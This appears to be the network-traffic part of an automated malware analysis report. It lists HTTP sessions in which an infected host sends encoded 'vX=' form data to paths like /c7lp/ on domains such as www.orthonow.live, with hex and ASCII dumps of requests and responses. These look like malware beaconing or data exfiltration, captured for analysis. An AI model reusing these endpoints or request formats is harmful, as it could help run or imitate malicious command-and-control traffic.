                                                            Data Raw: 76 58 3d 55 58 77 4f 37 51 47 48 4a 4d 4b 54 59 35 63 41 39 35 66 34 56 6a 72 52 4a 44 44 56 53 65 4f 77 4b 6a 2f 75 46 57 79 78 79 4e 4d 54 6e 67 79 6c 49 4f 49 5a 5a 6b 6b 56 34 71 67 63 6c 6e 4a 6f 65 7a 45 55 73 41 6f 66 4e 32 65 35 6d 45 4e 47 65 49 56 65 65 76 59 79 53 31 2f 2f 64 32 31 2f 6a 65 47 6d 2f 59 4d 33 4b 74 77 59 46 30 6a 4a 47 62 54 72 2b 41 67 75 53 56 70 54 34 69 6a 44 77 4b 6d 4c 50 63 68 2f 46 53 65 46 4d 71 41 2f 2f 42 56 2b 43 5a 53 33 6d 4e 74 72 30 2b 51 39 73 45 56 63 2b 77 59 4d 68 71 46 6d 30 46 69 77 2f 48 66 53 35 34 65 4d 61 64 37 64 31 48 49 36 32 4e 67 53 6b 4b 54 4b 2b 54 4f 38 4a 44 4c 2b 59 56 42 32 46 4f 47 51 6d 48 4e 6d 67 67 47 42 32 53 65 63 6a 41 46 67 31 52 57 63 4d 36 42 4b 44 44 4e 6a 53 42 62 70 41 4b 70 61 6c 49 4c 37 64 44 6a 72 5a 56 73 30 63 51 73 4f 76 43 4e 6c 4a 47 41 7a 64 41 2b 33 49 68 56 46 75 5a 58 45 48 67 30 79 41 71 46 74 47 68 6a 7a 58 44 31 36 54 2f 4a 5a 75 79 62 54 70 6a 53 38 54 37 2f 70 4c 70 6c 61 6e 6c 67 55 2f 43 6b 75 4d 65 57 [TRUNCATED]
                                                            Data Ascii: vX=UXwO7QGHJMKTY5cA95f4VjrRJDDVSeOwKj/uFWyxyNMTngylIOIZZkkV4qgclnJoezEUsAofN2e5mENGeIVeevYyS1//d21/jeGm/YM3KtwYF0jJGbTr+AguSVpT4ijDwKmLPch/FSeFMqA//BV+CZS3mNtr0+Q9sEVc+wYMhqFm0Fiw/HfS54eMad7d1HI62NgSkKTK+TO8JDL+YVB2FOGQmHNmggGB2SecjAFg1RWcM6BKDDNjSBbpAKpalIL7dDjrZVs0cQsOvCNlJGAzdA+3IhVFuZXEHg0yAqFtGhjzXD16T/JZuybTpjS8T7/pLplanlgU/CkuMeWGoabCzqtjZf4mxIhvFdxAS3maXDeRU/njmVlRxLMsp3mJY630ZOEUk90cS3LRoUdQIVht7dubLgBr3+7aXM9CzGZzp/SnpHButo7m5ypkNfVW+L9UkH1azNdIbEpztouVZWoMS3q8oJ28lLL1gI8ashPfrFX7+wLKh8WssSSAL+V/tat4I4QoPBCup1Ae7x1WmhRcH7c8PaVZ4fBd52rAynhDqyCIs/buBBsdJn8v9MRQgmNWLf1oKg+gSfF4ULbYxkxg0auY5MGxQQnWep0Vokh6ZD5+X3xG4z4CL/PmxtkJbre6F24c2TWWf2MLDpTN3Pp16n9sPiaGcPlxK4C1+Vt1
                                                            Jul 3, 2024 17:41:46.335401058 CEST2578OUTData Raw: 78 38 55 4c 6c 75 42 73 38 4b 49 79 4b 4f 53 4a 43 6e 73 31 4e 76 5a 56 37 50 6d 52 55 50 39 4a 33 63 50 4b 44 72 7a 48 76 41 30 76 30 6a 4a 5a 7a 42 5a 32 48 59 67 43 55 30 63 77 59 58 72 44 47 47 33 6c 72 4b 76 59 2b 6a 55 51 76 49 41 75 6a 58
                                                            Data Ascii: x8ULluBs8KIyKOSJCns1NvZV7PmRUP9J3cPKDrzHvA0v0jJZzBZ2HYgCU0cwYXrDGG3lrKvY+jUQvIAujXTDlXNAlK3IIsOrdFA1WhmLbKzhhaBevSS6DcAPrTjGRwcrSq2NDCaedSnOVmfyjg7+omxtXMun0lwV4HEN1ooNhOD7Y2QVgJRWw6mkUPQfNtPRdPGrzElPaOhobREprtE8fhVJtyOkrf9Fy0pSMC//GxjlZQ7Qsou
                                                            Jul 3, 2024 17:41:46.335453033 CEST9023OUTData Raw: 4e 67 76 2b 66 31 6f 2f 6f 36 79 34 36 33 4c 7a 50 74 76 43 7a 47 76 2b 46 51 38 6c 6d 55 5a 46 72 34 75 34 70 59 43 44 2b 6c 43 76 52 71 2b 74 45 71 58 72 5a 63 58 33 45 47 53 46 73 4c 76 6b 62 4a 43 62 6c 48 70 50 67 4e 6c 47 63 31 6f 35 6a 71
                                                            Data Ascii: Ngv+f1o/o6y463LzPtvCzGv+FQ8lmUZFr4u4pYCD+lCvRq+tEqXrZcX3EGSFsLvkbJCblHpPgNlGc1o5jqyzUvfn3uH+16nG1A1NjPeIHIWzlUZ4XLLxaCNrygn+E8rt0PvCMzTl2RYs0UBJjbnxaVoqYBtTEWFMF7hxbxiKufSblPkoFqG14r7rsAcMhnJz5SSk6iZbCv72VDLmR47BVCPYt/A3OoYHuvKChrgiy82/+fuSHVg
                                                            Jul 3, 2024 17:41:46.467875957 CEST1289OUTData Raw: 64 49 64 77 62 59 68 41 30 74 69 36 59 4a 31 73 4c 7a 48 53 67 41 49 37 48 45 69 34 4e 35 6b 7a 31 4c 53 61 54 71 58 4a 62 6b 6e 69 6e 4f 38 5a 51 47 37 53 73 54 6d 2f 59 49 53 79 4d 49 53 30 6f 4c 69 75 53 58 34 65 32 42 7a 52 58 5a 61 46 47 72
                                                            Data Ascii: dIdwbYhA0ti6YJ1sLzHSgAI7HEi4N5kz1LSaTqXJbkninO8ZQG7SsTm/YISyMIS0oLiuSX4e2BzRXZaFGr+yD5ykE7xCfMXuYsXdJDskmm24FE23pRluQiXOkzS0worERr+IzyY6y6O1VmNQLXlVAoiqA1SxHO0rFrKhJahXc/jMU+XJmIJ7qnGeeIIlromjKgYza4Qk/tZOw5W0Hz61N1zuitb14iBjBYP71zcOZWalkbqbHU4
                                                            Jul 3, 2024 17:41:46.467924118 CEST5156OUTData Raw: 64 31 73 51 56 67 44 75 4e 32 74 63 67 2f 70 6b 38 5a 5a 52 6f 75 43 77 35 70 6e 49 4e 77 66 72 58 74 57 75 45 45 5a 36 78 63 75 56 75 2f 54 2b 42 4e 4a 75 33 74 50 32 63 6d 65 44 56 4f 64 4b 52 54 65 65 34 4a 57 4b 4e 31 36 4b 4e 32 43 61 6a 71
                                                            Data Ascii: d1sQVgDuN2tcg/pk8ZZRouCw5pnINwfrXtWuEEZ6xcuVu/T+BNJu3tP2cmeDVOdKRTee4JWKN16KN2Cajq/1P2uOcK6Q8DLXe44akpR5WFXvUlWEUh8UrbqxaZOMA4KLZB4G6f1cPGp2QexLaXqK8lW4PXFwrx6JOWZfEQu/QAG5bJAKjYvV8OA5sUiKpSuL/QYDv0Ziy4eLvOz+AvtQgrJF73Lkvmt3BqaBIgJS3KaPwYNZlR8
                                                            Jul 3, 2024 17:41:46.467976093 CEST5156OUTData Raw: 79 69 68 73 4c 62 51 65 39 51 47 58 6a 76 4b 4a 67 64 47 50 35 75 4f 6f 4e 49 32 68 58 42 4f 47 6c 35 54 75 61 70 62 6b 51 30 33 4d 76 43 77 75 71 6b 37 2b 76 6d 66 47 65 67 37 46 30 6c 7a 52 64 6b 53 45 45 75 73 51 43 43 6d 2b 64 76 49 45 6d 48
                                                            Data Ascii: yihsLbQe9QGXjvKJgdGP5uOoNI2hXBOGl5TuapbkQ03MvCwuqk7+vmfGeg7F0lzRdkSEEusQCCm+dvIEmHy7ailHLuhSohDz2zW/8Rfl4lJd/nDpgi4fc3+ocst6XuF7jyn4/lbPXGlmO0waSgCzTdp1LcNQnlZ6cSlOYEsFxzRSXFfaeKOZJZohBDFy5bhUIxg9XNGE1cI68QAnpx1Du0W0j2dKnnuTHHrfOAQyrBWI2W70g6R
                                                            Jul 3, 2024 17:41:46.468142986 CEST6445OUTData Raw: 2f 4d 55 48 64 4a 49 68 4c 54 78 47 63 59 42 69 73 74 46 49 4d 42 47 55 2b 2f 47 69 4d 34 48 50 61 4c 75 41 6a 33 71 43 2f 68 63 63 7a 34 67 73 74 52 46 6a 36 6f 45 52 4c 59 2f 58 54 63 76 48 59 4a 45 49 38 66 47 42 61 61 2f 79 66 63 62 61 64 5a
                                                            Data Ascii: /MUHdJIhLTxGcYBistFIMBGU+/GiM4HPaLuAj3qC/hccz4gstRFj6oERLY/XTcvHYJEI8fGBaa/yfcbadZaV8BclhThaibfZ40fFggLQ1bU69LVQ0DrzJHzX/VsdR78mHAmrvRwLPqaxd1zf1Nle5J87c5H6EgDaGyUb6qgDr1yjPJPOfhbuXRXbmvz+uiH5rQfQgRTl6raQBOZhnEHjFJM84HIfg0+E378Ddw0ov+MxVxD/r6Q
                                                            Jul 3, 2024 17:41:46.468313932 CEST7734OUTData Raw: 37 41 49 67 68 66 77 6b 53 4b 37 4c 68 30 54 75 48 4e 53 33 47 65 58 35 44 6a 70 70 47 4f 33 33 50 4a 32 41 63 7a 4d 34 4d 42 6c 4c 53 69 61 70 38 41 57 6e 4e 77 31 67 2f 41 35 66 43 6a 51 4a 70 66 71 79 73 5a 30 48 2f 33 46 77 71 43 51 42 4e 46
                                                            Data Ascii: 7AIghfwkSK7Lh0TuHNS3GeX5DjppGO33PJ2AczM4MBlLSiap8AWnNw1g/A5fCjQJpfqysZ0H/3FwqCQBNF3SxP9lKTf1MFbUfd9JQAsxc2PlZmWLAkQ/WNDlaIhherg6+V+YHeGn1YyCZ8W89mv8X677kPfA7Is9XvndSfb4dMe7HibA7Dz7iG0YcuqlpkmjHbYRpQwTF35nKHK76q+uZ5lk2HZMSlmbAc4rgLLocODvaFiYOKS
                                                            Jul 3, 2024 17:41:46.600270987 CEST1289OUTData Raw: 4e 73 33 76 4c 75 64 66 6a 74 4e 2b 43 47 45 45 74 45 62 46 4a 4d 52 6f 43 4d 30 5a 74 4b 5a 67 38 4e 41 4f 6f 53 37 57 6d 48 62 65 72 34 36 31 6a 32 47 4b 56 56 52 34 59 56 63 31 32 30 4e 4e 49 61 64 52 4a 79 2f 66 41 4e 61 34 41 6a 44 59 35 55
                                                            Data Ascii: Ns3vLudfjtN+CGEEtEbFJMRoCM0ZtKZg8NAOoS7WmHber461j2GKVVR4YVc120NNIadRJy/fANa4AjDY5UA5D9TJzRRQfXKm8iy2KPv019cNvUbN9dxYYOiwXHSPPMjVcXbEovVwmGFj03KgOoGRfv4GsVnWNVbtDsoBTW5i01RTP5f6U7l/bPfPa3pb7vJjTsxsSzUDW8IZkgbqnXZdPg2+m/hpqqIJDcO/yHEl0SvYEdZgV+i
                                                            Jul 3, 2024 17:41:46.600321054 CEST3867OUTData Raw: 72 61 6b 6e 41 68 51 4c 75 39 41 38 54 6d 2f 31 2f 62 76 44 2b 7a 6b 4f 57 37 44 59 35 73 75 76 6a 68 4d 32 45 33 6d 69 6f 6e 47 44 72 4d 45 33 50 47 52 49 33 6a 44 4c 70 43 31 75 54 58 6c 61 66 62 75 75 69 68 6b 43 70 34 44 67 31 31 35 49 49 64
                                                            Data Ascii: raknAhQLu9A8Tm/1/bvD+zkOW7DY5suvjhM2E3mionGDrME3PGRI3jDLpC1uTXlafbuuihkCp4Dg115IIdz9ip3lQdpGAIlBZEZXr0ezHtEHffM3NFBpl9auLnUf1V++iaUgeEa6jqJfUvAG2fo4xIy1p5+xSFJxHNVDoBqowO/pVd//0y05VrL4jwy4H+MAu3iy0CMyp2S/A+4dZXEdykMdBkbCeystNr10x06fKnPFt3Dw5HY
                                                            Jul 3, 2024 17:41:46.600541115 CEST9714OUTData Raw: 76 74 34 75 65 51 76 5a 50 6c 2b 64 43 66 43 69 4c 42 79 73 36 4f 67 7a 51 4d 63 31 2b 38 5a 44 35 31 54 6a 33 71 38 32 50 73 56 32 73 79 76 4c 6b 35 50 75 6a 73 66 4a 31 43 61 78 64 79 54 6f 35 61 39 59 73 42 51 48 4d 36 76 31 47 34 69 74 32 56
                                                            Data Ascii: vt4ueQvZPl+dCfCiLBys6OgzQMc1+8ZD51Tj3q82PsV2syvLk5PujsfJ1CaxdyTo5a9YsBQHM6v1G4it2V8HSYzvbQx5vc8353gXUALcL5G3XVvzGJ7vzP4J6jos7m/SjdP5yTZRznLPW4GXUvX0nyVRRhkKYSE7dglVdLUoB0mqiSoUIy7TUnmoEAStZ/GqZzpI7gLERbjuN0XFhWbAzAt0QWyHb/AIDnrffP5T8HLmpGViOWj
                                                            Jul 3, 2024 17:41:46.738563061 CEST580INHTTP/1.1 404 Not Found
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Date: Wed, 03 Jul 2024 15:41:46 GMT
                                                            Server: Apache
                                                            Content-Encoding: gzip
                                                            Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                                            Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            57192.168.11.204983274.208.236.23080
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:41:49.018291950 CEST527OUTGET /9qp3/?vX=ZVYu4nT3XPb6D5AnzJCZdD7dAyPNRNa3VWXdQVyX2eJo5TfLIuEqAXNcy5gjyltbfDYrkl4fema7mXoYWaQkTP4cU372CGZgosL9vb0GBN03EULPLqCD5DY=&_B7=LxyxWrj8kri0gh HTTP/1.1
                                                            Host: www.motorsportgives.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:41:49.156029940 CEST770INHTTP/1.1 404 Not Found
                                                            Content-Type: text/html
                                                            Content-Length: 626
                                                            Connection: close
                                                            Date: Wed, 03 Jul 2024 15:41:49 GMT
                                                            Server: Apache
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            58192.168.11.2049833199.59.243.22680
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:41:54.322752953 CEST785OUTPOST /c7lp/ HTTP/1.1
                                                            Host: www.orthonow.live
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.orthonow.live
                                                            Referer: http://www.orthonow.live/c7lp/
                                                            Content-Length: 199
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 4e 62 46 30 67 51 34 72 33 2b 43 4b 4b 4d 76 52 56 58 73 2f 39 6c 42 50 32 6b 63 30 34 34 54 4e 4e 7a 7a 62 48 41 61 4f 70 56 5a 51 4a 42 54 39 4b 39 75 4e 69 62 67 6c 4b 6f 7a 62 6d 34 2f 5a 73 67 30 43 45 55 59 68 6a 5a 4d 30 57 72 6d 47 6d 45 5a 53 78 75 31 70 79 64 69 4d 58 6c 59 62 36 58 4e 46 33 45 72 43 32 74 78 72 79 7a 6f 42 6e 66 36 66 4e 73 2b 46 62 58 5a 47 68 47 33 68 77 5a 4a 41 52 75 67 42 50 38 7a 35 61 67 58 6f 59 34 74 46 50 54 4d 79 61 6c 47 2f 63 30 36 52 2b 45 49 67 45 2f 32 64 66 65 61 4d 30 4a 55 42 51 35 2b 51 69 6d 5a 55 4a 39 45 66 4e 4f 70 61 6d 41 3d 3d
                                                            Data Ascii: vX=NbF0gQ4r3+CKKMvRVXs/9lBP2kc044TNNzzbHAaOpVZQJBT9K9uNibglKozbm4/Zsg0CEUYhjZM0WrmGmEZSxu1pydiMXlYb6XNF3ErC2txryzoBnf6fNs+FbXZGhG3hwZJARugBP8z5agXoY4tFPTMyalG/c06R+EIgE/2dfeaM0JUBQ5+QimZUJ9EfNOpamA==
                                                            Jul 3, 2024 17:41:54.462959051 CEST1289INHTTP/1.1 200 OK
                                                            date: Wed, 03 Jul 2024 15:41:54 GMT
                                                            content-type: text/html; charset=utf-8
                                                            content-length: 1118
                                                            x-request-id: 191e9db4-e790-483e-b99a-5625e57fee7a
                                                            cache-control: no-store, max-age=0
                                                            accept-ch: sec-ch-prefers-color-scheme
                                                            critical-ch: sec-ch-prefers-color-scheme
                                                            vary: sec-ch-prefers-color-scheme
                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vFk822k414W4LEy0WueI+VTSidoXo7JWiQQpNL4wdqrjXci3A5YIfndgTYUPMnSpB446Y/4K6+3mggQkVkyo4g==
                                                            set-cookie: parking_session=191e9db4-e790-483e-b99a-5625e57fee7a; expires=Wed, 03 Jul 2024 15:56:54 GMT; path=/
                                                            connection: close
                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 76 46 6b 38 32 32 6b 34 31 34 57 34 4c 45 79 30 57 75 65 49 2b 56 54 53 69 64 6f 58 6f 37 4a 57 69 51 51 70 4e 4c 34 77 64 71 72 6a 58 63 69 33 41 35 59 49 66 6e 64 67 54 59 55 50 4d 6e 53 70 42 34 34 36 59 2f 34 4b 36 2b 33 6d 67 67 51 6b 56 6b 79 6f 34 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vFk822k414W4LEy0WueI+VTSidoXo7JWiQQpNL4wdqrjXci3A5YIfndgTYUPMnSpB446Y/4K6+3mggQkVkyo4g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                            Jul 3, 2024 17:41:54.462980032 CEST518INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                            Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTkxZTlkYjQtZTc5MC00ODNlLWI5OWEtNTYyNWU1N2ZlZTdhIiwicGFnZV90aW1lIjoxNzIwMDIxMzE0LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cub3J0aG9ub3cubGl2ZS9


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            59192.168.11.2049834199.59.243.22680
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:41:56.990092993 CEST1125OUTPOST /c7lp/ HTTP/1.1
                                                            Host: www.orthonow.live
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.orthonow.live
                                                            Referer: http://www.orthonow.live/c7lp/
                                                            Content-Length: 539
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 4e 62 46 30 67 51 34 72 33 2b 43 4b 49 73 66 52 58 32 73 2f 37 46 42 4d 37 30 63 30 78 59 54 4a 4e 7a 2f 62 48 46 32 65 70 44 42 51 4a 6b 2f 39 4c 34 53 4e 6c 62 67 6c 43 49 79 51 72 59 2f 4f 73 67 49 67 45 57 4d 68 6a 5a 59 30 58 5a 75 47 75 55 5a 52 37 4f 31 71 6b 74 69 42 54 6c 59 4e 36 58 77 6d 33 42 44 43 32 63 64 72 7a 78 51 42 77 36 4f 65 4a 4d 2b 35 53 33 5a 46 75 6d 33 72 77 5a 46 79 52 75 59 37 50 4b 7a 35 5a 41 33 6f 4b 34 74 47 57 54 4d 35 53 46 48 31 53 78 50 34 7a 51 41 4c 41 75 4f 31 61 73 7a 34 2b 5a 4d 62 59 72 53 49 7a 30 35 74 4a 2f 74 75 48 4f 70 66 38 59 78 48 48 6c 4a 77 36 65 6e 68 70 63 6d 5a 4d 6f 67 4f 6b 4e 4e 6c 62 52 51 42 46 37 75 4c 54 48 42 4b 78 75 4e 50 41 42 4e 71 6c 2b 77 66 49 4f 34 6d 66 6e 73 6f 33 38 55 38 79 75 62 52 2b 73 59 6b 6b 44 43 44 51 63 70 6a 64 79 6e 6c 43 4e 44 68 77 58 72 78 32 6d 4e 43 6d 4a 71 58 75 6d 63 34 53 2b 55 77 74 5a 31 35 2f 6e 6e 6c 39 48 43 33 51 67 77 2f 39 7a 55 35 47 68 72 4e 38 59 73 7a 38 39 6f 4d 67 37 32 47 6b 75 33 [TRUNCATED]
                                                            Data Ascii: vX=NbF0gQ4r3+CKIsfRX2s/7FBM70c0xYTJNz/bHF2epDBQJk/9L4SNlbglCIyQrY/OsgIgEWMhjZY0XZuGuUZR7O1qktiBTlYN6Xwm3BDC2cdrzxQBw6OeJM+5S3ZFum3rwZFyRuY7PKz5ZA3oK4tGWTM5SFH1SxP4zQALAuO1asz4+ZMbYrSIz05tJ/tuHOpf8YxHHlJw6enhpcmZMogOkNNlbRQBF7uLTHBKxuNPABNql+wfIO4mfnso38U8yubR+sYkkDCDQcpjdynlCNDhwXrx2mNCmJqXumc4S+UwtZ15/nnl9HC3Qgw/9zU5GhrN8Ysz89oMg72Gku31l5tBzmwOF3eZLgeZ8iXEhsjQqOrXmJPL5GG5JmYs4ecKw0ouwrjpUXDc6XxzgU/IC82DemRoNyC+EYMIt7czUO8H3NoQBSF0ErZ1hovt/1vFcqu4PkhYiE/M11YoaLSNfcUM6hU7FW2MdH4uZ3VXv3UaTcCrDNOpLJP0JFJGeXaUd7k8wjE1DqGSLstI0QIwkAlP9iM=
                                                            Jul 3, 2024 17:41:57.130173922 CEST1289INHTTP/1.1 200 OK
                                                            date: Wed, 03 Jul 2024 15:41:56 GMT
                                                            content-type: text/html; charset=utf-8
                                                            content-length: 1118
                                                            x-request-id: 07eeebbc-1c93-476d-8d7c-99d0af15cd3e
                                                            cache-control: no-store, max-age=0
                                                            accept-ch: sec-ch-prefers-color-scheme
                                                            critical-ch: sec-ch-prefers-color-scheme
                                                            vary: sec-ch-prefers-color-scheme
                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vFk822k414W4LEy0WueI+VTSidoXo7JWiQQpNL4wdqrjXci3A5YIfndgTYUPMnSpB446Y/4K6+3mggQkVkyo4g==
                                                            set-cookie: parking_session=07eeebbc-1c93-476d-8d7c-99d0af15cd3e; expires=Wed, 03 Jul 2024 15:56:57 GMT; path=/
                                                            connection: close
